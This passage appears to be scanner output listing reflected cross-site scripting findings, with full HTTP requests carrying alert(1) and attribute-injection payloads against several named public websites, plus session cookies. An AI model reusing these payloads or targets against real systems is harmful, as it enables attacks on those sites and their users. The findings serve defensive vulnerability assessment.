The value of the Group request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 35f67'%20a%3db%200611e0106fd was submitted in the Group parameter. This input was echoed as 35f67' a=b 0611e0106fd in the application's response. This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /candidate/my-profile.aspx?ID=cfs&SiteID=WebConnect&Group=cfs35f67'%20a%3db%200611e0106fd &Key=CN&CnId= HTTP/1.1 Host: webconnect.sendouts.com Proxy-Connection: keep-alive Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml" Date: Tue, 06 Sep 2011 20:33:52 GMT Content-Length: 6843 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>LogIn</title...[SNIP]... <link href='WebConnectCss/cfs35f67' a=b 0611e0106fd .css' type="text/css" rel="stylesheet" />...[SNIP]...
1.36. http://webconnect.sendouts.com/forgot-login.aspx [Group parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://webconnect.sendouts.com
Path:
/forgot-login.aspx
Issue detail
The value of the Group request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bb325'%20a%3db%208528d690379 was submitted in the Group parameter. This input was echoed as bb325' a=b 8528d690379 in the application's response. This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /forgot-login.aspx?ID=cfs&SiteID=WebConnect&Group=cfsbb325'%20a%3db%208528d690379 &Key=CN&CnId= HTTP/1.1 Host: webconnect.sendouts.com Proxy-Connection: keep-alive Referer: http://webconnect.sendouts.com/login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml" Date: Tue, 06 Sep 2011 20:34:07 GMT Content-Length: 4051 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML> <HEAD> <title>Get My Login Information</title> <meta name...[SNIP]... <LINK href='WebConnectCss/cfsbb325' a=b 8528d690379 .css' type="text/css" rel="stylesheet">...[SNIP]...
1.37. http://webconnect.sendouts.com/job-search.aspx [Group parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://webconnect.sendouts.com
Path:
/job-search.aspx
Issue detail
The value of the Group request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ff9f0'%20a%3db%20f4c3c17ad5d was submitted in the Group parameter. This input was echoed as ff9f0' a=b f4c3c17ad5d in the application's response. This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /job-search.aspx?ID=cfs&SiteID=WebConnect&Group=cfsff9f0'%20a%3db%20f4c3c17ad5d &Key=CN&CnId= HTTP/1.1 Host: webconnect.sendouts.com Proxy-Connection: keep-alive Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml" Date: Tue, 06 Sep 2011 20:33:46 GMT Content-Length: 9877 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Search Open ...[SNIP]... <link href='WebConnectCss/cfsff9f0' a=b f4c3c17ad5d .css' type="text/css" rel="stylesheet"/>...[SNIP]...
1.38. http://webconnect.sendouts.com/login.aspx [Group parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://webconnect.sendouts.com
Path:
/login.aspx
Issue detail
The value of the Group request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c1431'%20a%3db%20645a5e00b99 was submitted in the Group parameter. This input was echoed as c1431' a=b 645a5e00b99 in the application's response. This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfsc1431'%20a%3db%20645a5e00b99 &Key=CN&CnId= HTTP/1.1 Host: webconnect.sendouts.com Proxy-Connection: keep-alive Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml" Date: Tue, 06 Sep 2011 20:34:17 GMT Content-Length: 6809 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>LogIn</title...[SNIP]... <link href='WebConnectCss/cfsc1431' a=b 645a5e00b99 .css' type="text/css" rel="stylesheet" />...[SNIP]...
1.39. https://www.ca.com/us/register/login.aspx [returnURL parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The value of the returnURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ece79"><script>alert(1)</script>39e531be28d was submitted in the returnURL parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /us/register/login.aspx?returnURL=/us/default.aspxece79"><script>alert(1)</script>39e531be28d HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: http://www.ca.com/us/default.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351389192:ss=1315351389192; bn_u=6923713924586392201
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:26:23 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 18:26:23 GMT Content-Length: 35970 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <meta htt...[SNIP]... <a href="http://www.ca.com/us/register/createprofile.aspx?returnURL=/us/default.aspxece79"><script>alert(1)</script>39e531be28d " id="hrefRegisterNow" style="background-color:#0084c9; padding:4px 4px 4px 4px; text-decoration:none;color:#FFFFFF" target="_blank">...[SNIP]...
1.40. http://www.javalobby.org/articles/acegisecurity/part1.jsp [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.javalobby.org
Path:
/articles/acegisecurity/part1.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f89f"><script>alert(1)</script>75a3249fbe5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/acegisecurity/part1.jsp?8f89f"><script>alert(1)</script>75a3249fbe5 =1 HTTP/1.1 Host: www.javalobby.org Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Resin/3.2.1 Content-Type: text/html; charset=ISO-8859-1 Date: Tue, 06 Sep 2011 17:55:39 GMT Content-Length: 33612 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Securing Your Java Applications - Acegi Security Style</title> <meta http-equiv="content-type"...[SNIP]... <input type="hidden" name="successURL" id="successURL01" value="http://www.javalobby.org/articles/acegisecurity/part1.jsp?8f89f"><script>alert(1)</script>75a3249fbe5 =1" />...[SNIP]...
1.41. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [cmd parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_forFrameset_Header.jsp
Issue detail
The value of the cmd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91bbd"-alert(1)-"f87f5c47280 was submitted in the cmd parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC91bbd"-alert(1)-"f87f5c47280 &dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294 HTTP/1.1 Host: www.kb.sony.com Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Date: Tue, 06 Sep 2011 18:52:05 GMT Connection: close <html> <head> <title>Search Results Page</title> <link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet"> </head> <body bgcolor="#FFFFFF" text=...[SNIP]... nds(cmd){ switch (cmd){ case 'hilite' : var viewDocUrl = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC91bbd"-alert(1)-"f87f5c47280 &dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294"; viewDocUrl = viewDocUrl.replace("&highlight=off",""); var strValue="on"; ...[SNIP]...
1.42. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [dialogID parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_forFrameset_Header.jsp
Issue detail
The value of the dialogID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9159"-alert(1)-"4a3c1582004 was submitted in the dialogID parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985c9159"-alert(1)-"4a3c1582004 &docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294 HTTP/1.1 Host: www.kb.sony.com Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Date: Tue, 06 Sep 2011 18:52:06 GMT Connection: close <html> <head> <title>Search Results Page</title> <link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet"> </head> <body bgcolor="#FFFFFF" text=...[SNIP]... (cmd){ case 'hilite' : var viewDocUrl = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985c9159"-alert(1)-"4a3c1582004 &docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294"; viewDocUrl = viewDocUrl.replace("&highlight=off",""); var strValue="on"; str...[SNIP]...
1.43. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [docType parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_forFrameset_Header.jsp
Issue detail
The value of the docType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b2e1"-alert(1)-"87e65d4c18e was submitted in the docType parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc4b2e1"-alert(1)-"87e65d4c18e &cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294 HTTP/1.1 Host: www.kb.sony.com Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Date: Tue, 06 Sep 2011 18:52:04 GMT Connection: close <html> <head> <title>Search Results Page</title> <link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet"> </head> <body bgcolor="#FFFFFF" text=...[SNIP]... documentCommands(cmd){ switch (cmd){ case 'hilite' : var viewDocUrl = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc4b2e1"-alert(1)-"87e65d4c18e &cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294"; viewDocUrl = viewDocUrl.replace("&highlight=off",""); var strValue="...[SNIP]...
1.44. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [docTypeID parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_forFrameset_Header.jsp
Issue detail
The value of the docTypeID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9060"-alert(1)-"4496b4fc800 was submitted in the docTypeID parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1d9060"-alert(1)-"4496b4fc800 &stateId=1+0+328800294 HTTP/1.1 Host: www.kb.sony.com Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Date: Tue, 06 Sep 2011 18:52:07 GMT Connection: close <html> <head> <title>Search Results Page</title> <link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet"> </head> <body bgcolor="#FFFFFF" text=...[SNIP]... var viewDocUrl = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1d9060"-alert(1)-"4496b4fc800 &stateId=1+0+328800294"; viewDocUrl = viewDocUrl.replace("&highlight=off",""); var strValue="on"; strUrl = viewDocUrl + "&highligh...[SNIP]...
